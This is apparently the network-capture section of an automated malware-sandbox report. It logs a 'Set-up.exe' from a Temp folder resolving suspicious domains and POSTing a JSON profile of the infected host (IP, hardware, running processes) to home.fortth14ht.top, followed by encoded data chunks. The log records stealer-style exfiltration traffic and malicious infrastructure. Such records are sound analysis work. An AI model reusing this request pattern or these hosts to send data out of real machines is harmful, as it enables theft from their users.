Dec 28, 2024 09:29:55.743050098 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.743144035 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.743228912 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.743246078 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.745018005 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.751435995 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.803397894 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.845973015 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.897159100 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.918432951 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.922254086 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.922362089 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.922373056 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.922571898 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.923031092 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.923052073 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.923063993 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.923069954 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:56.217170000 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:56.217231035 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:56.217312098 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:56.217891932 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:56.217904091 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:57.475580931 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:57.475682974 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:57.476988077 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:57.476999044 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:57.477329016 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:57.482177973 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:57.482338905 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:57.482371092 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:58.431231976 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:58.431355953 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:58.431425095 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:58.441864967 CET	49787	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:58.441894054 CET	443	49787	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:58.810566902 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:58.810611963 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:58.810687065 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:58.810992956 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:58.811003923 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.114815950 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.115076065 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.116523981 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.116538048 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.116780043 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.118062019 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.118208885 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.118243933 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.118304968 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.163335085 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.949923992 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.950030088 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:00.950090885 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.950418949 CET	49794	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:00.950433969 CET	443	49794	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:01.157720089 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:01.157764912 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:01.157830954 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:01.158147097 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:01.158162117 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:02.418222904 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:02.418306112 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:02.419656992 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:02.419678926 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:02.419929028 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:02.421199083 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:02.421555042 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:02.421592951 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:02.421837091 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:02.421852112 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:03.408044100 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:03.408149958 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:03.408215046 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:03.408934116 CET	49800	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:03.408962011 CET	443	49800	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:03.878381014 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:03.878448009 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:03.878526926 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:03.878927946 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:03.878942966 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.088660002 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.088798046 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:05.090554953 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:05.090576887 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.090838909 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.094592094 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:05.094681978 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:05.094692945 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.934570074 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.934669971 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:05.934834003 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:05.935035944 CET	49810	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:05.935055017 CET	443	49810	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:06.845284939 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:06.845335960 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:06.845417023 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:06.845737934 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:06.845752001 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.148794889 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.149158001 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.150480986 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.150495052 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.150787115 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.152376890 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.152980089 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.153012991 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.157138109 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.157186985 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.157320023 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.157351017 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.157479048 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.157505035 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.157668114 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.157696009 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.157879114 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.157907963 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.157917023 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.161216974 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.161248922 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.203336000 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.205302000 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.205365896 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.205380917 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.247342110 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.249500990 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.249550104 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.249579906 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.291356087 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.297224998 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:08.339339018 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:08.902776957 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:12.197660923 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:12.197772980 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:12.197840929 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:12.261909008 CET	49818	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:12.261928082 CET	443	49818	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:12.351217031 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:12.351267099 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:12.351353884 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:12.356385946 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:12.356400013 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:13.613924026 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:13.613991022 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:13.615340948 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:13.615350962 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:13.615638971 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:13.616995096 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:13.617012024 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:13.617064953 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.479001045 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.479093075 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.479119062 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.479147911 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.479166031 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.479181051 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.479192019 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.487356901 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.487390995 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.487430096 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.487442970 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.487489939 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.495790005 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508339882 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508374929 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508388996 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.508405924 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508444071 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.508449078 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508479118 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508519888 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.508646011 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.508663893 CET	443	49830	172.67.128.184	192.168.2.5
Dec 28, 2024 09:30:14.508675098 CET	49830	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:30:14.508681059 CET	443	49830	172.67.128.184	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:29:28.131145000 CET	50715	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:28.132973909 CET	50715	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:28.416965008 CET	53	50715	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:28.422358036 CET	53	50715	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:37.333626032 CET	52348	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:37.560092926 CET	53	52348	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:46.054995060 CET	62742	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:46.055046082 CET	62742	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:46.689701080 CET	53	62742	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:46.689830065 CET	53	62742	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:50.832350016 CET	65343	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:50.832389116 CET	65343	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:50.972302914 CET	53	65343	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:50.972537994 CET	53	65343	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:51.040426970 CET	50364	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:51.353657007 CET	53	50364	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:52.557344913 CET	50365	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:52.557377100 CET	50365	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:29:52.696580887 CET	53	50365	1.1.1.1	192.168.2.5
Dec 28, 2024 09:29:52.696949005 CET	53	50365	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:29:28.131145000 CET	192.168.2.5	1.1.1.1	0xffbd	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:28.132973909 CET	192.168.2.5	1.1.1.1	0x1381	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 28, 2024 09:29:37.333626032 CET	192.168.2.5	1.1.1.1	0x4a2b	Standard query (0)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:46.054995060 CET	192.168.2.5	1.1.1.1	0x849e	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:46.055046082 CET	192.168.2.5	1.1.1.1	0xc5c1	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:29:50.832350016 CET	192.168.2.5	1.1.1.1	0x20d7	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:50.832389116 CET	192.168.2.5	1.1.1.1	0x9dff	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:29:51.040426970 CET	192.168.2.5	1.1.1.1	0x85be	Standard query (0)	spuriotis.click	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:52.557344913 CET	192.168.2.5	1.1.1.1	0xf286	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:52.557377100 CET	192.168.2.5	1.1.1.1	0x190	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:29:28.416965008 CET	1.1.1.1	192.168.2.5	0xffbd	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:28.416965008 CET	1.1.1.1	192.168.2.5	0xffbd	No error (0)	httpbin.org		3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:37.560092926 CET	1.1.1.1	192.168.2.5	0x4a2b	Name error (3)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:46.689830065 CET	1.1.1.1	192.168.2.5	0x849e	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:50.972537994 CET	1.1.1.1	192.168.2.5	0x20d7	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:51.353657007 CET	1.1.1.1	192.168.2.5	0x85be	No error (0)	spuriotis.click		172.67.128.184	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:51.353657007 CET	1.1.1.1	192.168.2.5	0x85be	No error (0)	spuriotis.click		104.21.2.51	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:29:52.696949005 CET	1.1.1.1	192.168.2.5	0xf286	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

spuriotis.click

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49762	194.87.58.92	80	4352	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:29:46.812155008 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 514003 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 34 39 38 30 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957549801", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:29:46.933818102 CET	7416	OUT	Data Raw: 55 58 78 5a 70 31 74 44 41 32 6f 70 5a 32 78 30 32 38 75 4a 72 61 36 6e 76 30 6b 74 76 35 73 2b 6b 6c 39 49 53 58 67 46 6b 33 43 6d 49 77 48 42 7a 34 32 7a 37 6a 44 4f 38 56 6c 57 57 5a 58 58 34 67 5c 2f 77 42 56 73 72 77 2b 48 79 33 4c 71 32 5a Data Ascii: UXxZp1tDA2opZ2x028uJra6nv0ktv5s+kl9ISXgFk3CmIwHBz42z7jDO8VlWWZXX4g\/wBVsrw+Hy3Lq2ZZlmGZZ3DJeI8TRjRpxoUMNhsLkeNq4rEYmKlLDUadStH+5voTfQ8yz6WOa+KOK4t8VMR4ScA+EnCeT8QcQ5\/k\/AcfEzivM8y4m4iwnDfDnD\/DfB2J4z8O8rxdTFYirjcdmWZZtxtkmEyzL8tqypRzDG4jC4Kr+
Dec 28, 2024 09:29:46.933868885 CET	9888	OUT	Data Raw: 4f 49 34 59 58 6a 48 68 4c 44 34 47 57 61 5a 67 38 6d 6e 6d 75 59 63 53 34 4c 49 73 4e 69 63 7a 71 59 4c 4c 63 56 67 59 34 50 43 54 7a 48 43 59 4b 6e 57 6c 43 64 54 46 56 6f 34 69 68 43 74 47 4e 53 65 44 77 32 50 65 47 6a 55 78 45 73 50 43 72 5c Data Ascii: OI4YXjHhLD4GWaZg8mnmuYcS4LIsNiczqYLLcVgY4PCTzHCYKnWlCdTFVo4ihCtGNSeDw2PeGjUxEsPCr\/ALy+A3hLic58A\/HPNOJKXBvCsOPqHBHDHhFxD4lZrlXB2F4h4syfiWWf55h+FM84hxOX0cThsPkmBrZZmeIy+pVwlDPs34Xp5tWw2V080xOE\/p8r+P7\/AIK0\/DDwh8MP+ChWo3PgvTLfRIfi38BfDXxX8X6f
Dec 28, 2024 09:29:46.933933020 CET	4944	OUT	Data Raw: 5c 2f 67 4c 78 44 5c 2f 77 77 6c 38 41 74 4c 5c 2f 34 56 76 34 71 74 5c 2f 48 33 67 6a 78 44 65 2b 4d 76 37 4a 74 50 45 62 32 66 6a 44 2b 30 50 41 32 68 65 4d 5c 2f 68 33 5c 2f 77 6a 32 73 76 42 70 74 70 5c 2f 77 6e 6e 5c 2f 41 41 6c 73 4d 72 61 Data Ascii: \/gLxD\/wwl8AtL\/4Vv4qt\/H3gjxDe+Mv7JtPEb2fjD+0PA2heM\/h3\/wj2svBptp\/wnn\/AAlsMrax4X0qCb1f4H\/8Ey\/2Hv2cPiRonxd+DXwNt\/CPxE8OW+r22heI5viB8VfFEmlx67pN5oWrNaad4w8c+INHS4vNH1C\/05rv+zzdRWt5cxwTRCaTd94V8pleXVMHhpUq805uvUqp0KtaMeWdOlC0reycmvZtq6fL
Dec 28, 2024 09:29:46.933959007 CET	2472	OUT	Data Raw: 75 59 34 57 53 6c 68 38 79 79 75 74 6a 73 75 78 75 48 6d 32 72 4f 6a 6a 4d 4a 4b 6a 58 6f 79 62 35 62 4f 46 53 4c 62 74 62 6f 66 61 33 68 6e 39 74 50 34 74 61 4a 70 30 2b 6c 61 74 64 52 2b 4a 4c 43 65 31 6b 74 6d 53 39 6b 45 63 32 48 51 6f 48 2b Data Ascii: uY4WSlh8yyutjsuxuHm2rOjjMJKjXoyb5bOFSLbtbofa3hn9tP4taJp0+latdR+JLCe1ktmS9kEc2HQoH+0TwX7R+XnKxWq2sIA2mMjbt8M8UfFnxh4teVb\/AFO4isZC2NPjmaC0CnorwwCGCYgHaJJId+M5bLNu8m0DUtJ8U+Mvh\/4D0TxD4XbxD8S\/iD4L+GnhoX+uRQaePEfjvX7Hw3ojajNp8Gq30Nguo6hA15LZ6Zf3
Dec 28, 2024 09:29:47.053551912 CET	2472	OUT	Data Raw: 33 4a 36 2b 56 56 4d 76 7a 72 44 5a 68 68 63 72 6a 6a 4a 59 36 74 51 78 57 55 59 7a 47 34 64 71 68 5c 2f 5a 32 4f 68 61 56 57 4d 71 6c 58 43 59 69 6a 52 6a 55 71 30 70 77 58 51 55 56 59 30 65 58 77 54 34 71 2b 49 48 67 76 34 66 2b 42 76 32 67 66 Data Ascii: 3J6+VVMvzrDZhhcrjjJY6tQxWUYzG4dqh\/Z2OhaVWMqlXCYijRjUq0pwXQUVY0eXwT4q+IHgv4f+Bv2gf2dfHEviu1+Jt\/q3iXQfEfxph8OeAtO+E\/w48V\/FTxTqfiMa78AdG8QeJtIPhXwT4lbTta+EWgfE7RbjUbG1tZtRto9a0G51Rhbw0rxa8Piz8HJ\/gxN8Fbb9oCP9pGy1j4n3vwZ\/4VtefEn\/AIUvBdtZwfCE
Dec 28, 2024 09:29:47.053589106 CET	4944	OUT	Data Raw: 32 41 31 2b 66 34 6e 2b 4a 4e 4f 6c 73 37 56 64 55 66 54 5a 66 44 66 6e 33 73 2b 72 57 32 72 4a 46 6f 6b 33 73 58 78 48 30 54 51 76 68 76 34 36 38 52 66 44 49 5c 2f 46 7a 34 51 66 45 4c 78 5c 2f 77 43 43 50 46 6d 6f 2b 43 76 69 46 34 53 2b 47 30 Data Ascii: 2A1+f4n+JNOls7VdUfTZfDfn3s+rW2rJFok3sXxH0TQvhv468RfDI\/Fz4QfELx\/wCCPFmo+CviF4S+G0vxon1LwJr+lB0vbbWtS+IvwQ+GvhTU447mOSzWbwh4l8TK88bPgWhS5f8AsPLvFnw6zjOqfDuVcVYDMc7qYzNcBHLsFTxmJrxxWR4pYHN4VPZYaUKMMuxko4XFV6s4YelXlCm6vNKKf+beZeB\/ivkXDk+Lc64LzP
